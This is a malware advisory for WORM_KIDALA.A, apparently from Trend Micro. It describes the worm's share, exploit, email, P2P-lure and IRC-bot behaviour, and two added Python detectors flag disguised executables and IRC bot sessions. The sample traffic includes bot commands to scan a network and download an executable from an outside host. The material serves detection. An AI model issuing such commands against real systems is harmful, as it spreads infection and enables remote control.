
WORM_KIDALA.A
Saturday, 22 April 2006
Description:

Malware Overview

Trend Micro has received numerous samples of this worm spreading in the wild.

It uses social engineering techniques in order to propagate through several methods.

Social engineering, a propagation technique widely used by worm programs, relies largely on computer users' instinctive tendency to open email messages, execute attachments that look enticing and harmless, and download and unknowingly open attractively named files.

This worm may propagate by generating IP addresses and dropping a copy of itself into the default shares of the generated addresses. It can also exploit the following vulnerabilities to propagate:

* Microsoft Security Bulletin MS03-007
* Microsoft Security Bulletin MS04-011
* DameWare Remote Control Server stack overflow vulnerability

In addition, it can spread by attaching a copy of itself to an email message, which it sends to target recipients. Users should take note of the email details to avoid infection.

Aside from the aforementioned propagation routines, this worm can also spread by dropping copies of itself into the shared folders of popular P2P applications, including eDonkey2000, iMesh, KAZAA, LimeWire, Morpheus, and WarezP2P.

The dropped copies are named after legitimate applications or as cracks for popular software. Copies may also pose as adult content by using the names of popular actresses. As a result, users on the network are more likely to open these files; once a target user copies and executes one of them, his or her machine is infected by this worm.
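A shared-folder audit can catch these lures before anyone double-clicks them, because the name says "media" or "crack" while the bytes say "Windows executable". The script below is an added example for this page, not code from Trend Micro or from the worm; it builds a throwaway folder of constructed files (a fake PE under a .jpg name, a double-extension "video", a crack-named .exe, and two benign files) and classifies each one by its real type, its extensions and its name. The lure word list and the fake sample contents are assumptions; a real deployment would extend the regex with the product and actress names seen in the environment.

```python
"""Flag files in a P2P shared folder that look like the lures described
above: PE executables named as cracks/keygens, as legitimate applications,
or as adult content, often hiding behind a misleading extension.

Added example, not code from the Trend Micro write-up. Lure-word lists and
the sample directory are constructed for illustration.
"""
import os
import re
import tempfile

# Name fragments used to pass an executable off as something desirable.
LURE_RE = re.compile(
    r"(crack|keygen|serial|patch|warez|xxx|porn|nude|sex)", re.IGNORECASE)
# Extensions Windows executes on double-click.
EXEC_EXT = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd"}
# Extensions a lure pretends to be. An MZ file carrying one of these, or one
# placed just before an executable extension, is suspicious.
DECOY_EXT = {".jpg", ".jpeg", ".gif", ".avi", ".mpg", ".mp3", ".zip", ".pdf", ".doc"}

def is_pe(path):
    """MZ magic check: the real file type, independent of the name."""
    with open(path, "rb") as f:
        return f.read(2) == b"MZ"

def classify(path):
    """Return the list of reasons the file is suspicious (empty = clean)."""
    name = os.path.basename(path)
    parts = name.lower().split(".")
    exts = ["." + p for p in parts[1:]]
    reasons = []
    pe = is_pe(path)
    if pe and exts and exts[-1] in DECOY_EXT:
        reasons.append("executable disguised with a media/document extension")
    if len(exts) >= 2 and exts[-1] in EXEC_EXT and exts[-2] in DECOY_EXT:
        reasons.append("double extension hiding an executable")
    if LURE_RE.search(name) and (pe or (exts and exts[-1] in EXEC_EXT)):
        reasons.append("crack/keygen/adult lure name on an executable")
    return reasons

def scan_share(folder):
    """Map filename -> reasons for every suspicious file in `folder`."""
    findings = {}
    for entry in os.scandir(folder):
        if entry.is_file():
            reasons = classify(entry.path)
            if reasons:
                findings[entry.name] = reasons
    return findings

def build_sample_share():
    """Construct a throwaway 'shared folder' with lures and benign files."""
    d = tempfile.mkdtemp(prefix="p2pshare_")
    samples = {
        "Photoshop_CS2_crack.exe": b"MZ\x90\x00fake PE",      # crack lure
        "Jenna_Jameson_video.avi.exe": b"MZ\x90\x00fake PE",  # double extension
        "holiday.jpg": b"MZ\x90\x00fake PE",                  # PE behind .jpg
        "song.mp3": b"ID3\x03\x00real-looking mp3",           # benign
        "readme.txt": b"plain text",                          # benign
    }
    for name, data in samples.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(data)
    return d

if __name__ == "__main__":
    share = build_sample_share()
    for name, why in sorted(scan_share(share).items()):
        print(f"{name}: {'; '.join(why)}")
```

Point `scan_share()` at the real shared folder of each P2P client listed above instead of the constructed one; the magic-byte check is what makes the heuristic useful, since a renamed executable keeps its MZ header no matter what the name claims.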

This worm has Internet Relay Chat (IRC) bot functionality: the infected machine becomes a server program that a remote attacker controls over IRC. It opens a random port and connects to a certain IRC server, then joins an IRC channel. Once connected, it receives commands through that channel. The commands control the affected system and the behavior of the bot itself; the worm executes them on the affected machine, further exposing it to other malicious attacks.
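The handshake described above (register a nickname, join a channel, wait for commands) is visible in traffic regardless of which port the IRC server listens on, which matters because bot servers rarely sit on 6667. The analyser below is an added example for this page, not code from Trend Micro or from the worm: it walks constructed, reassembled TCP payload lines tagged with a session id and direction, follows the IRC registration state per session, and reports sessions that completed registration and joined a channel, together with the commands the channel operator sent. The record format, the sample session and the command words (`.scan`, `.download`) are this example's assumptions, not the worm's actual command set.

```python
"""Spot the IRC bot behaviour described above in reassembled TCP payloads:
a client registering with NICK/USER, joining a channel, then receiving
commands over PRIVMSG. Works on any port, since bot servers rarely use 6667.

Added example, not code from the Trend Micro write-up. The record format
(session id, direction, payload line) and the sample capture are constructed
for illustration; the command words are generic, not this worm's own.
"""
import re
from collections import defaultdict

IRC_CMD_RE = re.compile(
    r"^(?::(?P<prefix>\S+) )?(?P<cmd>[A-Z]+|\d{3})(?: (?P<params>.*))?$")
STANDARD_IRC_PORTS = {6667, 6697}

def parse_irc(line):
    """Split one IRC protocol line into (prefix, command, params)."""
    m = IRC_CMD_RE.match(line.strip())
    if not m:
        return None
    return m["prefix"], m["cmd"], m["params"] or ""

def endpoint_port(session_id):
    """Server port from a constructed 'src:port->dst:port' session id."""
    return int(session_id.rsplit(":", 1)[1])

def analyse_sessions(records):
    """records: (session_id, direction, payload); direction is 'out'
    (infected host -> server) or 'in'. Returns indicators for sessions that
    registered a nick and joined a channel, i.e. completed a bot check-in."""
    state = defaultdict(lambda: {"nick": None, "user": False,
                                 "channels": set(), "commands": []})
    for sid, direction, payload in records:
        parsed = parse_irc(payload)
        if not parsed:
            continue
        prefix, cmd, params = parsed
        s = state[sid]
        if direction == "out":
            if cmd == "NICK" and params:
                s["nick"] = params.split()[0]
            elif cmd == "USER":
                s["user"] = True
            elif cmd == "JOIN" and params:
                s["channels"].update(
                    c for c in params.split()[0].split(",") if c.startswith("#"))
        elif direction == "in" and cmd == "PRIVMSG":
            # Operator -> bot, e.g. ":op!u@h PRIVMSG #chan :.scan 10.0.0.0/8"
            target, _, text = params.partition(" :")
            if target in s["channels"] or target == s["nick"]:
                s["commands"].append(text)
    return {
        sid: {"nick": s["nick"], "channels": sorted(s["channels"]),
              "commands": s["commands"],
              "nonstandard_port": endpoint_port(sid) not in STANDARD_IRC_PORTS}
        for sid, s in state.items()
        if s["nick"] and s["user"] and s["channels"]
    }

# Constructed capture: session A is the bot (server on TCP 7000, not 6667);
# session B is a human IRC user who never joins a channel or gets commands.
BOT = "10.0.0.5:1234->198.51.100.7:7000"
HUMAN = "10.0.0.8:4321->203.0.113.9:6667"
SAMPLE = [
    (BOT, "out", "NICK [USA]XP-48213"),
    (BOT, "out", "USER xp 0 * :xp"),
    (BOT, "in",  ":irc.example 001 [USA]XP-48213 :Welcome"),
    (BOT, "out", "JOIN #ch4n k3y"),
    (BOT, "in",  ":op!o@h PRIVMSG #ch4n :.scan 10.0.0.0/8 445"),
    (BOT, "in",  ":op!o@h PRIVMSG [USA]XP-48213 :.download http://198.51.100.7/x.exe"),
    (HUMAN, "out", "NICK alice"),
    (HUMAN, "out", "USER alice 0 * :Alice"),
    (HUMAN, "in",  ":bob!b@h PRIVMSG alice :lunch?"),
]

if __name__ == "__main__":
    for sid, info in analyse_sessions(SAMPLE).items():
        print(sid, info)
```

The nick, channel and server endpoint recovered this way are the indicators worth blocking and hunting on; an ordinary IRC user who registers but never joins a channel, or who joins one and only chats, does not trip the rule, while a machine-generated nick on a non-standard port followed by dotted command words is exactly the pattern the description above predicts.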

It also terminates several processes related to antivirus and security applications, in order to evade early detection and removal from the affected machine.